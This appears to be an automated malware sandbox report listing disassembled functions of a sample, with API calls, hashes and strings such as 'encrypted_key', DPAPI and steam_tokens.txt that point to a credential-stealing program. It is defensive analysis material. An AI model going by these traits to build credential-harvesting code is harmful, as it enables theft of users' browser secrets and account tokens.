                              • Opcode ID: d48770d2664757d94e13dc6545471d165f5e5482742aac28b88f58c219217877
                              • Instruction ID: 0edffbe8dd9ab38623a05e8bf85de232599579029654fa9d47ce02255d882520
                              • Opcode Fuzzy Hash: d48770d2664757d94e13dc6545471d165f5e5482742aac28b88f58c219217877
                              • Instruction Fuzzy Hash: 97414371A2014CDBCB64EF64EC86FDE7778AF54304F408068B909A7251EE34AE558F91
                              Function 007B9C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 007B9CA8
                              • LocalAlloc.KERNEL32(00000040,?), ref: 007B9CDA
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 007B9D03
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocLocallstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2746078483-738592651
                              • Opcode ID: e0325cc62e5a330382c925070ceb9316ecc1d6c85538775d4f182de095d785c4
                              • Instruction ID: 05fcfa9ca8cc5a95baeae48fbf90521011f165c2f10835f2556803670696f0c4
                              • Opcode Fuzzy Hash: e0325cc62e5a330382c925070ceb9316ecc1d6c85538775d4f182de095d785c4
                              • Instruction Fuzzy Hash: 40419D71A012499BDB21EF65DC897EEBBB4AF54304F048464EF25AB253EA38ED05C790
                              Function 007CE9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                              Download Yara Rule
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007CEA24
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CEA53
                              • lstrcat.KERNEL32(?,00000000), ref: 007CEA61
                              • lstrcat.KERNEL32(?,007E1794), ref: 007CEA7A
                              • lstrcat.KERNEL32(?,01458B98), ref: 007CEA8D
                              • lstrcat.KERNEL32(?,007E1794), ref: 007CEA9F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: db3b65701d538458a775cdb9d00b2063ba9f8895ec38a440d0a25236ccad8512
                              • Instruction ID: 7b18f33b5866e63effe6d6d4709a681154b2e028e481dafb7abae4113a9910da
                              • Opcode Fuzzy Hash: db3b65701d538458a775cdb9d00b2063ba9f8895ec38a440d0a25236ccad8512
                              • Instruction Fuzzy Hash: 28419A71911158EFCB55EF64DC86FED7378FF88300F404468BA1AAB281DE749E859B50
                              Function 007CECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CECDF
                              • lstrlen.KERNEL32(00000000), ref: 007CECF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CED1D
                              • lstrlen.KERNEL32(00000000), ref: 007CED24
                              • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 007CED52
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: steam_tokens.txt
                              • API String ID: 367037083-401951677
                              • Opcode ID: 3467b607b5ebd2ce3eaf03a2799642894b0c6e05bf876efc811fc19487389a40
                              • Instruction ID: 87f8cf122272c50bfdf00affc6b4f3d0207bf68293417c147f00548cb95cbec5
                              • Opcode Fuzzy Hash: 3467b607b5ebd2ce3eaf03a2799642894b0c6e05bf876efc811fc19487389a40
                              • Instruction Fuzzy Hash: E8314B31A165559BC722BF78E84EB9E77A9AF40700F059168BC46EB213DA2CDC0687D1
                              Function 007B9A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,007B140E), ref: 007B9A9A
                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,007B140E), ref: 007B9AB0
                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,007B140E), ref: 007B9AC7
                              • ReadFile.KERNEL32(00000000,00000000,?,007B140E,00000000,?,?,?,007B140E), ref: 007B9AE0
                              • LocalFree.KERNEL32(?,?,?,?,007B140E), ref: 007B9B00
                              • CloseHandle.KERNEL32(00000000,?,?,?,007B140E), ref: 007B9B07
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 3639be3c0f1a171802a01265c2140b0da4da27828e27becb249e1cbea5f71150
                              • Instruction ID: 5590c431b231bdb95a89281d2d38dd6920cf6a8c277994edc83085613a3e7bf4
                              • Opcode Fuzzy Hash: 3639be3c0f1a171802a01265c2140b0da4da27828e27becb249e1cbea5f71150
                              • Instruction Fuzzy Hash: 74111CB1614209AFEB10DFA9DCC8FAB776CEB04740F104569FA15EA280EB749D40CBA0
                              Function 007D5AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 007D5B14
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA188
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA1AE
                              • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 007D5B7C
                              • memmove.MSVCRT(00000000,?,?), ref: 007D5B89
                              • memmove.MSVCRT(00000000,?,?), ref: 007D5B98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long
                              • API String ID: 2052693487-3788999226
                              • Opcode ID: 61566c43595a4a0d3ead0dba4207a8a6ef39038602f98534853f3b7b3863c68c
                              • Instruction ID: 7d3993bbb1922702c1d05f2a7bd0ebf6d83e495ba488c4f20506841e52b447ec
                              • Opcode Fuzzy Hash: 61566c43595a4a0d3ead0dba4207a8a6ef39038602f98534853f3b7b3863c68c
                              • Instruction Fuzzy Hash: 194164B1B005199FCF18DF6CC995AAEB7F5EB88310F15822AE919E7345E634DD01CBA0
                              Function 007D90DD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Typememset
                              • String ID:
                              • API String ID: 3530896902-3916222277
                              • Opcode ID: 8aa6cdb7d85401d4ca0fcdbf4730251240696e4a6cefc30f468956d2d36b4dd9
                              • Instruction ID: 70faf4678b98f5f11b38ad5973b31efc0b6e3579d2ac6220d0b7e82dd216b28f
                              • Opcode Fuzzy Hash: 8aa6cdb7d85401d4ca0fcdbf4730251240696e4a6cefc30f468956d2d36b4dd9
                              • Instruction Fuzzy Hash: E841EB7150475CAEDB358B248C89FFB7BFCAB45704F1444E9EA8687282E275AA45CF20
                              Function 007C7D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 007C7D58
                                • Part of subcall function 007DA1C0: std::exception::exception.LIBCMT ref: 007DA1D5
                                • Part of subcall function 007DA1C0: std::exception::exception.LIBCMT ref: 007DA1FB
                              • std::_Xinvalid_argument.LIBCPMT ref: 007C7D76
                              • std::_Xinvalid_argument.LIBCPMT ref: 007C7D91
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_$std::exception::exception
                              • String ID: invalid string position$string too long
                              • API String ID: 3310641104-4289949731
                              • Opcode ID: d56d3579069d75bda7a96d596393b60c3e67ebcf20f614183f89641f391e12a3
                              • Instruction ID: 7a63b2dd4e42b65fd055d4be701e66f8ade1bc4414e58975702b46a47afbb0a3
                              • Opcode Fuzzy Hash: d56d3579069d75bda7a96d596393b60c3e67ebcf20f614183f89641f391e12a3
                              • Instruction Fuzzy Hash: 3721A5723046049BD728DE6CD881F3AB7E5BF95750F204A6EE4528B342EB79DC40CBA5
                              Function 007D33C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007D33EF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D33F6
                              • GlobalMemoryStatusEx.KERNEL32 ref: 007D3411
                              • wsprintfA.USER32 ref: 007D3437
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB
                              • API String ID: 2922868504-2651807785
                              • Opcode ID: 91829f6f07ca972f2c5a710bab8385139a4559526981cfdcc92612bc814fa008
                              • Instruction ID: 2ba79bd94360fef93d23a658ec1f5a071fe437a69dd4878f8688f951e5410867
                              • Opcode Fuzzy Hash: 91829f6f07ca972f2c5a710bab8385139a4559526981cfdcc92612bc814fa008
                              • Instruction Fuzzy Hash: 320128B1A14248AFDB14DF98CC49BBEB7B8FB45710F00012AF906E7380D7785D0086A1
                              Function 007D926D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit$__getptdfree
                              • String ID: Xu~$Xu~
                              • API String ID: 2640026729-944843931
                              • Opcode ID: bff66685397ab876663e64bdb7aa6dfc4c864cc23d77c18cd60dc327a711cf6e
                              • Instruction ID: 1a30d412bf7e49ae3c77d180309d4402d5f635500688073e82cbcb4c1df882bf
                              • Opcode Fuzzy Hash: bff66685397ab876663e64bdb7aa6dfc4c864cc23d77c18cd60dc327a711cf6e
                              • Instruction Fuzzy Hash: 5E01C032A06B51EBDB18AB69948A79DB370BF04B20F584017E9046B781EB2C7D40DBD9
                              Function 007D2400 Relevance: 7.7, APIs: 6, Instructions: 234stringCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlenmemset
                              • String ID:
                              • API String ID: 3212139465-0
                              • Opcode ID: 6a484ef14bb2bd7790fe1bfc6c178d4698c15f15a459ec213a1e2e006b22a620
